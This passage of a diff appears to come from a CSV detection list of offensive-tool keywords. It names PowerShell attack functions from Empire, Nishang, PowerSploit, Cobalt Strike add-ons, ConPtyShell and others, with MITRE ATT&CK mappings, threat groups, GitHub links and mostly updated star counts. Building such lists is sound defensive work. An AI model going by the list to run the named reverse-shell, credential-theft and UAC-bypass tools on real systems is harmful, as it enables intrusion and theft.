- T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","0","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" "*Invoke-Bof.ps1*","offensive_tool_keyword","cobaltstrike","Load any Beacon Object File using Powershell!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/airbus-cert/Invoke-Bof","1","1","N/A","10","10","232","32","2021-12-09T15:10:41Z","2021-12-09T15:09:22Z" -"*Invoke-BruteAvailableLogons*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential 
Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","112","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" -"*Invoke-BruteForce*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-BruteLogonAccount*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","112","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" -"*Invoke-BruteLogonList*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","112","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*Invoke-BruteAvailableLogons*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*Invoke-BruteForce*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7851","2361","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" +"*Invoke-BruteLogonAccount*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" +"*Invoke-BruteLogonList*","offensive_tool_keyword","PowerBruteLogon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/PowerBruteLogon","1","1","N/A","N/A","2","113","21","2022-03-04T14:12:08Z","2021-12-01T09:40:22Z" "*Invoke-BSOD*","offensive_tool_keyword","Invoke-BSOD","A PowerShell script to induce a Blue Screen of Death (BSOD) without admin privileges. 
Also enumeartes Windows crash dump settings.","T1561 - T1059","TA0002 - TA0008 - TA0011","N/A","N/A","Exploitation tools","https://github.com/peewpw/Invoke-BSOD","1","0","N/A","N/A","3","265","73","2018-04-03T13:36:45Z","2018-03-30T14:20:10Z" "*Invoke-BuildAnonymousSMBServer -*","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","0","N/A","6","3","222","43","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z" "*Invoke-BuildAnonymousSMBServer.ps1*","offensive_tool_keyword","Invoke-BuildAnonymousSMBServer","Use to build an anonymous SMB file server","T1570 - T1027 - T1071.001","TA0010","N/A","N/A","Data Exfiltration","https://github.com/3gstudent/Invoke-BuildAnonymousSMBServer","1","1","N/A","6","3","222","43","2021-08-20T14:52:10Z","2021-07-10T01:23:43Z" -"*Invoke-BypassUAC*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-BypassUAC*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1123","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-CallbackIEX*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-Carbuncle*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-BypassUAC*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-BypassUAC*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1123","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-CallbackIEX*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerBreach.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-Carbuncle*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" "*Invoke-Cats -pwds*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential 
Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*Invoke-Cats.ps1*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","1","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" -"*Invoke-Certify*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1257","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" -"*Invoke-Certify*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*Invoke-Certify*","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","1","N/A","10","10","1260","284","2023-03-01T17:10:43Z","2020-04-06T16:34:52Z" +"*Invoke-Certify*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" 
"*invokechecklocaladminaccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" "*Invoke-CheckLocalAdminAccess*","offensive_tool_keyword","cobaltstrike","PowerView menu for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tevora-threat/aggressor-powerview","1","1","N/A","10","10","60","17","2018-03-22T00:21:57Z","2018-03-22T00:21:13Z" -"*Invoke-CheckLocalAdminAccess*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-CheckLocalAdminAccess*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*invoke-checklocaladminaccess*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" -"*Invoke-ClipboardMonitor*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Invoke-ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*Invoke-ConPtyShell*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive 
security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Invoke-ConPtyShell*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*Invoke-ConPtyShell.ps1*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","817","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" -"*Invoke-CreateRemoteThread*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Invoke-ClipboardMonitor*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Invoke-ConPtyShell*","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1021 - T1071","TA0002","N/A","N/A","Exploitation tools","https://github.com/antonioCoco/ConPtyShell","1","1","N/A","N/A","9","819","150","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z" +"*Invoke-ConPtyShell*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive 
